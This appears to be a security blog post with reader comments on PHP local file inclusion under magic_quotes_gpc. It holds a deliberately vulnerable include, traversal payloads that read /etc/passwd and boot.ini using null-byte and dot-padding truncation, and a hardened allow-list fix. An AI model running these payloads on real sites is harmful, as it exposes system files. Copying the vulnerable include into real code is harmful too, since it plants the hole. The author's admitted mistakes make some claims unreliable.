Local File Inclusion with Magic_quotes_gpc enabled

So, let's look at a piece of code:

<?php
// Deliberately vulnerable: $_GET['page'] is concatenated into the include path unchanged.
include('inc/' . $_GET['page'] . '.php');
?>

Normally, you would use the null byte (%00) to exploit it:

vuln.php?page=../../../../../etc/passwd%00

but if magic_quotes_gpc is enabled then the null byte (%00) will get converted to \0, which means the attack fails.

How to bypass this: if you append a large number of dots (…..) to the path, the null byte is not required. e.g.

vuln.php?page=../../../../../etc/passwd%00……………………………………………………………………..(200 dots in this case)

vuln.php?page=../../../../../etc/passwd……………………………………………………………………..(200 dots in this case)

Correction: You don't need the null byte here.

Update: As pointed out by Bogdan, this only works on Windows, so replace /etc/passwd with /../../boot.ini. I will provide a POC link.

Tested on PHP version 5.2.12 (WAMP environment).
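The vulnerable include from the post next to a hardened version, as an added example (not code from the original post). It assumes PHP 7 or later, an ./inc/ directory holding the includable pages, and the page names in $allowed are made up for illustration; the fix is to allow-list page names rather than to rely on magic_quotes_gpc, which only rewrites %00 and does nothing against ../ or dot padding.

```php
<?php
// Added example, not the original post's code. Assumed layout: includable pages live in ./inc/ as *.php.

// Vulnerable form (as in the post): every byte of $_GET['page'] reaches the filesystem.
// magic_quotes_gpc only turns %00 into \0; "../" and long runs of dots pass through untouched.
function vulnerable_include(string $page): void
{
    include('inc/' . $page . '.php');
}

// Hardened form: map the request to a known page name, never to a path.
// Returns the resolved file on success, null for anything that should be refused.
function resolve_page(string $page, array $allowed, string $baseDir): ?string
{
    // 1. Only plain identifiers: no slashes, no dots (so no traversal, no dot padding), no NUL.
    if (!preg_match('/^[a-z0-9_]{1,32}$/', $page)) {
        return null;
    }
    // 2. Allow-list by name, so even a well-formed name must be one we actually ship.
    if (!in_array($page, $allowed, true)) {
        return null;
    }
    // 3. Defence in depth: the resolved path must stay inside $baseDir (realpath follows links too).
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $page . '.php');
    if ($base === false || $full === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($full, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $full;
}

// Hypothetical page names used for illustration.
$allowed = ['home', 'about', 'contact'];
$target = resolve_page($_GET['page'] ?? '', $allowed, __DIR__ . '/inc');
if ($target === null) {
    // ../../../../../etc/passwd%00, the 200-dot variant and /../../boot.ini all end up here.
    http_response_code(404);
    exit;
}
include $target;
```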

References: http://www.xakep.ru/post/50862/novaya_veha_v_teorii_include.rar

10 Thoughts on "Local File Inclusion with Magic_quotes_gpc enabled"

  1. Good one Sid!

  2. i wanna see a printscreen :)

  3. No, it's not about the null byte. It works like this: vuln.php?page=../../../../../etc/passwd….(lots of dots). With the null byte it doesn't work.

    It only works on Windows AND it only works if the include is relative.

    If you have something like:
    include "d:\\xampp\\htdocs\\test\\" . $_GET['i'] . ".txt"; it doesn't work.

  4. Hi Bogdan,

    I have only tested it on Windows. While the backslash (\) will get escaped by magic quotes, the forward slash will not be escaped, so that explains why it will only work if the include is relative on Windows.

    I can confirm that in my Windows setup, it worked with the null byte. As you pointed out, it doesn't work with the null byte and the null byte is actually not required.

  5. Hi,
    Very interesting, only I am not able to reproduce it. I tested from 100 to > 4096 dots; this does not disable the NULL byte from being escaped.

    You say you tested on WAMP? i.e. Windows? How can /etc/passwd work on Windows?

    I tried on Windows also, and it failed. Could you please explain or give POC code?

    Thanks

  6. Hi skully, please see the update, you don't need magic quotes at all. I managed to make so many mistakes in a small blog post :(

  7. Pingback: Week 5 in Review | Infosec Events

  8. I did try with etc/passwd%00
    but that does not work.
    Any ideas?

  9. Pingback: 草名园 » PHP File Inclusion Vulnerability Exploitation
